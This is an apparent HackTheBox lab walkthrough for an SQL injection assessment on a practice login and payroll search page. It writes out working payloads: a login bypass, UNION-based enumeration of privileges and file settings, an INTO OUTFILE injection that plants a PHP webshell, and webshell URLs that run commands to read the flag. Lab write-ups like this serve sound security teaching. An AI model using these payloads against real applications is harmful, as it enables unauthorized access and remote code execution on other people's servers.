HackTheBox - SQL Injection Fundamentals - Skills Assessment Walkthrough

Scenario

The company Inlanefreight has contracted you to perform a web application assessment against one of their public-facing websites. In light of a recent breach of one of their main competitors, they are particularly concerned with SQL injection vulnerabilities and the damage the discovery and successful exploitation of this attack could do to their public image and bottom line.

They provided a target IP address and no further information about their website. Perform a full assessment of the web application from a "grey box" approach, checking for the existence of SQL injection vulnerabilities.

Find the vulnerabilities and submit a final flag using the skills we covered to complete this module. Don't forget to think outside the box!

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system.

Walkthrough

Navigating to the target URL displays a login screen:

We can try to assume the structure of the SQL query and try to bypass it by SQL injection. It might look like:

SELECT username FROM users WHERE username=<USERNAME_INPUT> AND password=<PASSWORD_INPUT>;

Injecting the next payload into the username parameter can bypass authentication by commenting out the password check and forcing the SQL query to return true:

So we can try to inject different payloads to complete the SQL query without errors, make WHERE statement always true so it will always retrieve data and commenting the rest of the query:

' OR '1'='1'-- -

So it might look like:

SELECT username FROM users WHERE username=' OR '1'='1'-- - AND password=<PASSWORD_INPUT>;

It worked !

We enter the next page, where we can see a table of payroll information with 2 rows:

We have a search functionality, let’s check if is there a chance for it to be vulnerable to SQL injection by entering ‘ :

Our input appears to break the SQL query, returning an error that reveals the use of MariaDB (a fork of MySQL), allowing us to use MySQL syntax for the injection.

With output returned, we can use a UNION-based SQL injection.

Our first step is to identify how many columns the query returns.

Using the ORDER BY technique, we inject ORDER BY <COL_NUM> starting at 1 and increment until an error appears. The last valid number is the table’s column count.

Success (ORDER BY 1):

Fail (ORDER BY 10):

After a few attempts, we found the table has 5 columns.

Next, we’ll test the UNION SELECT injection and identify which of the 5 columns (only 4 displayed) are accessible. Our payload:

' UNION SELECT 1, 2, 3, 4, 5 -- -

We can see that columns 2, 3, 4, and 5 are displayed:

From here, we can continue using UNION-based SQL injection to extract more data from the server - databases, tables, users, sensitive information and more.

Our current goal is to achieve RCE on the server, so we will focus on writing a file.

To do this, we first need information about the current user and its capabilities.

Retrieve the current user executing the queries on the server:

' UNION SELECT 1, user(), 3, 4, 5-- -

The current user is root.

Get the Super_priv value for user 'root' from the mysql.user table:

' UNION SELECT 1, super_priv, 3, 4, 5 FROM mysql.user WHERE user="root"-- -

The value 'Y' indicates that the root user has broad privileges on the MySQL server.

Retrieve the system privileges of the user 'root':

' UNION SELECT 1, grantee, privilege_type, is_grantable, 5 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

Specifically, we check for privilege_type = FILE and is_grantable = YES, which means the current user can read and write files on the system:

Finally, we check the value of the global variable secure_file_priv:

' UNION SELECT 1, variable_name, variable_value, 4, 5 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

An empty (NULL) value indicates no restrictions on directories for file read and write operations.

After validating the current user’s capabilities, we are ready to create the webshell file and execute commands through it.

The web application is built with PHP, so we will inject the following payload into the search bar, which contains a PHP webshell code:

' UNION SELECT 1, '<?php system($_REQUEST[cmd]); ?>',3, 4, 5 INTO OUTFILE '/var/www/html/dashboard/webshell.php'-- -

Enter the path where the file was written and add the cmd URL parameter with the command ls to list the contents of the current directory:

http[:]//94.237.123.233:59444/dashboard/webshell.php?cmd=ls

Next, after a few checks, we found the flag file in the root directory:

http[:]//94.237.123.233:59444/dashboard/webshell.php?cmd=ls+/

Let's output the content using cat /flag_cae1dadcd174.txt:

http[:]//94.237.123.233:59444/dashboard/webshell.php?cmd=cat+/flag_cae1dadcd174.txt

And found the flag 😁